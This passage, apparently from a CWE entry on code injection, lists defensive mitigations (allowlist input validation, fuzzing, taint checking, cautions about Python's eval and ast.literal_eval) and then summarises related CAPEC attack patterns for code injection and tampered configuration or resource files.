  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.